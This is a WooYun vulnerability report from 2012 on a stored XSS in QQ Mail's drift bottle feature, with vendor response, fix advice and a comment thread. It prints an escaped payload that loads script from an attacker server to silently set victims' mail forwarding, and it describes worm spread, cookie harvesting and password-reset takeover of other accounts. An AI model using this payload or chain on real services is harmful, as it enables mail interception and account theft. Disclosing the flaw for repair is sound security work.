当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010770

漏洞标题:漂流瓶:飘来的可能是局长,也可能是XSS , Orz ...

相关厂商:腾讯

漏洞作者: gainover

提交时间:2012-08-10 08:43

修复时间:2012-09-24 08:44

公开时间:2012-09-24 08:44

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-08-10: 细节已通知厂商并且等待厂商处理中
2012-08-10: 厂商已经确认,细节仅向厂商公开
2012-08-20: 细节向核心白帽子及相关领域专家公开
2012-08-30: 细节向普通白帽子公开
2012-09-09: 细节向实习白帽子公开
2012-09-24: 细节向公众公开

简要描述:

一只漂流瓶向你飘了过来。。它飘来的可能是对美好生活的向往,可能是对世俗的抱怨,可能是某局长发来的某某某,它,还有可能是XSS!。漂流瓶,作为一项个人认为是“娱乐”的功能,却放在了QQ邮箱这种涉及到个人隐私和私密信息的系统里,一旦存在漏洞,将会导致QQ邮箱本身的安全防护荡然无存。在这个帖子里,我给大家演示的就是,当漂流瓶这个娱乐功能存在存储型XSS之后,对邮箱这个核心功能所带来的影响。
试想:
1. 同学们~ 还敢玩漂流瓶么? 当你打开一个漂流瓶之后,QQ号码信息,邮箱里的小秘密就被我知道了,会是一种什么感觉呢?
2. 如果用这个东西做一个主动扩散的蠕虫,哇咔咔,一夜春风来,花落知多少啊,知多少......会有多少邮箱被设置转发到俺邮箱啦!!!
同时,在PKAV小组官网上,也对相关细节进行了描述,具体见:http://pkav.net/2012/08/qq-piaoliuping-xss/ (为了避免利用代码对厂商造成的危害,现在对此文进行了加密操作,厂商对漏洞修复后,将进行公开)

详细说明:

1. 漏洞成因:漂流瓶某处参数过滤不当,导致存储型XSS。
具体测试过程:
1.1 发送一个漂流瓶,并使用漂流瓶的录音功能。
1.2 定位到发送的漂流上,F12打开调试工具看代码。


1.3 同时查看抓包的代码,可以看到相同内容。


1.4 进而进行字符测试,测试使用\u0022\u003E时,发生侧漏


1.5 说明这里对反斜线的过滤存在问题。
1.6 进一步构造我们的利用代码。下面仅贴出部分源码。
请求时的利用代码

var serv="恶意外部JS文件所在服务器";
	var mail2rec="接受转发的邮箱";
	var mailUin="发送恶意漂流瓶的Hacker QQ";
	var evil_code="voice_21121721212136.mp3\\u0022\\u003e\\u003cimg src=1 onerror=\\u0022loadJSSrc(\\u0027"+serv+"?u="+mail2rec+"\\u0026i="+mailUin+"\\u0027);this.style.display=\\u0027none\\u0027\\u0022\\u003e\\u003cb a=\\u0022";


进行修改邮箱转发设置及传播时,自动扔回大海,删除瓶子等代码

@see http://itsokla.duapp.com/qq_piaoliuping_xss_code.txt


代码中,所用到的pkav Object 见 http://itsokla.duapp.com/pkav.js (from http://pkav.net)
2. 因为成因并不是很复杂,这里主要强调后续利用带来的影响。
邮箱业务和漂流瓶处于同一域名下。就算是cookie加了保护,我们也可以直接通过ajax对邮箱的数据进行操作。因而这里带来的危害是很明显的。


3. 我们以设置邮箱转发作为危害实例。根据缺陷,我们构造好利用代码,并编写利用工具。


4. 在我们发送带有恶意代码的漂流瓶之后,打开我们的收件邮箱,可以看到受害者的邮箱被设置转发了。


5. 这里以我的小号做邮件转发测试,向我的受害者小号发送邮件之后,我们可以在收信箱里看到我们“监听”收到的邮件~


6. 当然上面只是第一级的危害。我们还可以进一步扩大危害范围。
7. 配合cookies收集,我们很容易从cookies里得到受害者的QQ号码信息。进而通过QQ资料获取更多的信息。以便下一步进行攻击!


8. 这里再“假设”受害者同时是微博的用户,或者百度的用户,由于微博或者百度官方通常会发一些系统提醒邮件,这个时候我们可以进一步获取受害人信息。(其实不用假设,经过取样分析,这种情况是很常见的。):


那么我们如果利用百度的密码找回功能。


可以看到我们就可以收到对方的密码修改邮件,从而实现密码的修改。


10. 上面只是以百度作为例子,现在的密码找回功能,很多都是与邮箱挂钩的!而当前许多用户都是使用的QQ邮箱,因而会威胁到用户其它网站的安全。
11. 由于是同域,我们甚至可以伪装受害者向受害者的朋友发送欺诈邮件,由于是二次攻击,信任关系增强,危害将会变得更大。
12. 当然,漂流瓶这个蠕虫,还有个特点,就是利用漂流瓶自己的传播功能,自发蠕虫,隐蔽,不易被发现。
13. 我们不难看到,一个娱乐圈的混进了行政圈,带来了多么严重操蛋的后果啊!!

漏洞证明:

见详细说明!

修复方案:

修复方法:
1. 修复当前XSS问题,但不能保证漂流瓶的其它功能是否存在类似问题。
2. 架构有问题,建议将漂流瓶这个功能与邮箱进行业务隔离。以免因小失大!
3. 建议将“邮件转发”这种涉及到邮件安全的设置动作,加上验证码操作,以防止由于普通XSS而导致的后门功能!

版权声明:转载请注明来源 gainover@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-08-10 12:52

厂商回复:

非常感谢gainover的报告,我们已在着手修复此问题。

最新状态:

暂无

漏洞评价:

评论

  1. 2012-08-10 08:44 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    这漂的是炸弹啊

  2. 2012-08-10 08:46 | wanglaojiu ( 普通白帽子 | Rank:168 漏洞数:39 | 道生一,一生二,二生三,三生万物,万物负...)

    这个牛,顶起

  3. 2012-08-10 08:53 | 坏虾 ( 路人 | Rank:28 漏洞数:8 | From Internet,For Internet……BY:坏虾)

    艹 我天天捞瓶子

  4. 2012-08-10 08:59 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    碉堡!

  5. 2012-08-10 09:01 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

  6. 2012-08-10 09:01 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    这尼玛。。。。怎么捞到自己扔的。。

  7. 2012-08-10 09:05 | CCOz ( 路人 | Rank:22 漏洞数:7 | 本人还是处,有意的富婆请联系我,五万以下...)

    @水滴 太精辟了。。怎么捞到并确定漏洞存在的。。。

  8. 2012-08-10 09:09 | saline ( 普通白帽子 | Rank:231 漏洞数:32 | Focus On Web Secur1ty)

    gainover是跨站神牛,不去甲方可惜了

  9. 2012-08-10 09:29 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    @gainover 碉堡~~还好我早就关闭漂流瓶的应用了~

  10. 2012-08-10 09:29 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    @CCOz 也许回复瓶子也行。。。

  11. 2012-08-10 09:32 | Rona ( 实习白帽子 | Rank:88 漏洞数:23 | test)

    牛逼啊。。。

  12. 2012-08-10 09:37 | 墨水心_Len ( 实习白帽子 | Rank:70 漏洞数:15 | PKAV技术宅 | 每一个有文化的东西,我们都...)

    围观一下漂流弹...

  13. 2012-08-10 09:45 | x7iao ( 普通白帽子 | Rank:348 漏洞数:41 | 文能床上控萝莉,武能床上定人妻)

    火钳刘明

  14. 2012-08-10 09:47 | cnrstar ( 普通白帽子 | Rank:157 漏洞数:23 | Be my personal best!)

    膜拜跨站帝!

  15. 2012-08-10 09:48 | WebSPRing ( 普通白帽子 | Rank:176 漏洞数:18 | Focus on Web Security (wspringox@gmail.c...)

    强烈围观!!

  16. 2012-08-10 09:53 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @水滴 恩,回复可以,根据“回复可以”就可以推断出 “发送也可以”,毕竟一个程序用2套呈现逻辑就太奢侈了。当然,再盲测验证一下就知道是否真的可以了。

  17. 2012-08-10 10:32 | 啤酒 ( 实习白帽子 | Rank:62 漏洞数:8 | 道不同.喝酒结盟)

    果然还是出了..远程跪拜@gainover

  18. 2012-08-10 10:34 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    @gainover 人类已经阻止不了你拉

  19. 2012-08-10 10:50 | 猥琐 ( 路人 | Rank:6 漏洞数:2 | 学习什么的最重要!)

    收到过各种信息,最便宜的20一晚,嗯嗯!

  20. 2012-08-10 11:05 | saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)

    @gainover 你的网站 被黑啦 http://pkav.net/license.txt

  21. 2012-08-10 11:07 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @CCOz 可以定向爆破的~

  22. 2012-08-10 11:08 | 猥琐 ( 路人 | Rank:6 漏洞数:2 | 学习什么的最重要!)

    @saviour Helen=。=

  23. 2012-08-10 11:13 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @saviour = = ,又是helen这个名字,老看到有人说,就是不知道是谁咧~ ×^_^*, 让他们用点点的不用,这下好啦~悲剧了。

  24. 2012-08-10 11:22 | saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)

    @gainover 这个xss 的访问密码告我下 我去看看

  25. 2012-08-10 11:31 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    helen无处不在!

  26. 2012-08-10 11:46 | 波波虎 ( 普通白帽子 | Rank:266 漏洞数:51 | 11111111111)

    @gainover 文章密码多少啊,看不了

  27. 2012-08-10 12:19 | hongygxiang ( 普通白帽子 | Rank:115 漏洞数:12 | 蛋疼)

    洞主碉堡!

  28. 2012-08-10 12:47 | 腰上有胸器 ( 路人 | Rank:11 漏洞数:5 | 一根带刺的黄瓜和一个女人的故事。)

    helen神牛。~.~呼哈

  29. 2012-08-10 12:55 | 承诺 ( 路人 | Rank:17 漏洞数:2 | 你关注的漏洞 发表了白帽子)

    @saviour 亲,你难道没看到是 license.txt 吗

  30. 2012-08-10 13:30 | saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)

    @承诺 怎么可能没看到

  31. 2012-08-10 13:46 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    @saviour ....那是某人闲的蛋疼自己改的

  32. 2012-08-10 14:00 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @only_guest 你们真心蛋疼!!!!

  33. 2012-08-10 14:13 | 小一 ( 实习白帽子 | Rank:32 漏洞数:13 )

    @gainover 怎么加入pkav....

  34. 2012-08-10 14:35 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @小一 私信@only_guest

  35. 2012-08-10 14:36 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @saviour @波波虎 给腾讯一些修复时间吧。 :)

  36. 2012-08-10 14:50 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    不是有、他的团队 嘛

  37. 2012-08-10 16:45 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    这飘的真是炸弹啊!!

  38. 2012-08-10 18:02 | 天一生水 ( 路人 | Rank:0 漏洞数:2 )

    牛叉,可惜没权限看日志。

  39. 2012-08-11 14:30 | 我了个去 ( 普通白帽子 | Rank:139 漏洞数:14 | 4892057@qq.com ...)

    最近捞瓶子的要注意了

  40. 2012-08-11 14:45 | only_guest 认证白帽子 ( 普通白帽子 | Rank:800 漏洞数:75 | PKAV技术宅社区-专心做技术.PKAV已经暂停...)

    PKAV上的详细内容已经公开.

  41. 2012-08-11 15:36 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    我 看到 啦 这思路 。。都成神马了

  42. 2012-08-11 16:05 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    又是一个精华+礼物了。

  43. 2012-08-11 18:07 | 啤酒 ( 实习白帽子 | Rank:62 漏洞数:8 | 道不同.喝酒结盟)

    昨天都想爆头了,原来点真在眼皮下。。。

  44. 2012-08-11 19:03 | softbug ( 实习白帽子 | Rank:66 漏洞数:10 | 为人类设计最好的软件,解放人的双手,一起...)

    pkav很给力,gainover也很给力

  45. 2012-08-11 19:14 | print_0x0000 ( 实习白帽子 | Rank:88 漏洞数:22 | 一枚苦逼的农民工.)

    膜拜跨站牛...

  46. 2012-08-12 14:01 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

    那个分析代码的是插件还是什么工具啊,球名称

  47. 2012-08-12 22:31 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @Vty 那个工具是charles,不过PKAV小组官网的文章并没加密啊。 @gainover

  48. 2012-08-12 23:15 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

    @px1624 嗯,没加密,估计已经修复了,上午刚找到了这个工具,呵呵,fiddler好使

  49. 2012-08-13 13:23 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    传说漂流瓶是张小龙的一个试验性产物,按照下文的功能理解,又不完全是“一个娱乐圈的混进了行政圈”行为:http://t.cn/hDVckb

  50. 2012-08-13 13:24 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    也就是说,在试验过程中,他们的团队似乎认为这两个业务是等同的,只不过是是否属于匿名的问题

  51. 2012-08-14 23:08 | 冷冷的夜 ( 普通白帽子 | Rank:135 漏洞数:12 )

    碉堡了

  52. 2012-09-10 09:43 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    修复方案最后一条“以防止由于普通XSS而导致的后门功能” 非普通xss 就吊爆啦~

  53. 2012-09-10 12:28 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    缺陷关联:(1) WooYun: 新浪邮箱邮件正文XSS (2) WooYun: yahoo邮箱XSS一枚 (3) WooYun: Gmail Xss漏洞可以导致用户被劫持 (邮箱xss)

  54. 2012-09-11 00:21 | free ( 路人 | Rank:5 漏洞数:1 | 自由、平等、互助)

    的确碉堡了

  55. 2012-09-13 18:08 | 葫芦 ( 路人 | Rank:10 漏洞数:2 | coder,dotaer)

    表单接受后再次转义"'<>的转义值序列,比如\u0022变为\\u0022,然后原始的<>正常转义为&lt;或&rt;其他语言不知,C#中表单接受的str(值为\u0022\u003e),直接Replace用"\""去替换的话不可行。

  56. 2012-09-24 09:24 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    我们不难看到,一个娱乐圈的混进了行政圈,带来了多么严重操蛋的后果啊!!

  57. 2012-09-25 15:48 | 摩斯 ( 路人 | Rank:3 漏洞数:2 | 每天进步一点点!努力学习技术!)

    果真是大牛啊

  58. 2012-11-03 18:37 | 下载-狐狸围巾 ( 路人 | Rank:1 漏洞数:1 | 网络,这是我们的天地!)

    @腰上有胸器 .。helen真是!= =

  59. 2013-04-30 18:10 | AntBean ( 路人 | Rank:6 漏洞数:2 | 01d day)

    跨站帝。。。